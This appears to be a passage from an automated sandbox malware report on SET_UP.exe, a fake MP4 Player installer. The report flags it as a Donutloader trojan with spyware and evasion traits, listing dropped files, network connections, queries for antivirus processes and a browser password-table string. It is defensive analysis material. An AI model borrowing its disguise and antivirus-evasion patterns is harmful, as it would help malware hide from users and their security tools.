            Source: SET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: SET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/download.html
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.html
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player/update.xml
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-playerA
            Source: SET_UP.exe, 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004080EC GetParent,GetKeyState,GetKeyState,GetKeyState,PostMessageW,0_2_004080EC
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B486B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,0_2_004B486B
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B09F5 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,SendMessageW,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,0_2_004B09F5
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004BCB4B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,0_2_004BCB4B

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Sample or dropped binary is a compiled AutoHotkey binary
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0041D56A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_0041D56A
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A5F610_2_004A5F61
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004841F10_2_004841F1
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0047C1B00_2_0047C1B0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A828C0_2_004A828C
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004204160_2_00420416
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004586700_2_00458670
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004407C00_2_004407C0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0046C8500_2_0046C850
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004689D00_2_004689D0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00448B200_2_00448B20
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00404DA70_2_00404DA7
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0046CF400_2_0046CF40
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00488F000_2_00488F00
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0047D1800_2_0047D180
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004852300_2_00485230
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004894800_2_00489480
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0043D4B00_2_0043D4B0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004416800_2_00441680
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004197D10_2_004197D1
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004857F00_2_004857F0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0046D8200_2_0046D820
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0047D9400_2_0047D940
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0042190D0_2_0042190D
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00449BA00_2_00449BA0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A5C250_2_004A5C25
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A5D160_2_004A5D16
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A5E200_2_004A5E20
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00481EE00_2_00481EE0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00449E8E0_2_00449E8E
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A5EA00_2_004A5EA0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 00496E75 appears 49 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 00496DC0 appears 339 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 004AF857 appears 54 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 00425C79 appears 34 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 004C4D62 appears 38 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 004749F0 appears 111 times
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 004BC31A appears 39 times
            Source: SET_UP.exeStatic PE information: invalid certificate
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.drStatic PE information: Number of sections : 11 > 10
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.drStatic PE information: Number of sections : 11 > 10
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.drStatic PE information: Number of sections : 11 > 10
            Source: SET_UP.exe, 00000000.00000003.1969800222.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966243946.0000000003C80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967615439.0000000003BC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966990463.0000000003ABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1972519369.0000000003D0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967400282.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967721763.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967833052.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1973060526.0000000003BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968154432.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970689425.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968914828.0000000003BBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969593206.0000000003ABF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970117688.0000000003BCC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971285796.0000000003BDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969370980.0000000003BB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967942757.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966625247.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968373832.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968481399.0000000003BBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMP4Player.EXE vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970232666.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1975540190.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1974546596.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969480169.0000000003CC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971164527.0000000003AB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968564993.0000000003ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970810055.0000000003CDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970457041.0000000003CE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970031083.0000000003AB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971528559.0000000003BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971794934.0000000003AB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968772939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968662914.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970927214.0000000003AC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966480404.0000000003BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967504482.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967202416.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1832528276.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMP4Player.EXE vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1965927695.0000000003ABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1973519910.0000000003AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966880719.0000000003C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970344765.0000000003BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1965800504.0000000003C73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968263654.0000000003BBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966073674.0000000003B97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966766218.0000000003B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1972083777.0000000003BDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971407700.0000000003ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967094793.0000000003BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1978455915.0000000003BE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968048902.0000000003BC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970573517.0000000003AB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/13@3/3
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0041D56A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_0041D56A
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B4D21 FindResourceW,LoadResource,LockResource,0_2_004B4D21
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
            Source: C:\Users\user\Desktop\SET_UP.exeFile created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeJump to behavior
            Source: SET_UP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: SET_UP.exe, 00000000.00000003.1873439977.0000000003711000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SET_UP.exeVirustotal: Detection: 8%
            Source: SET_UP.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
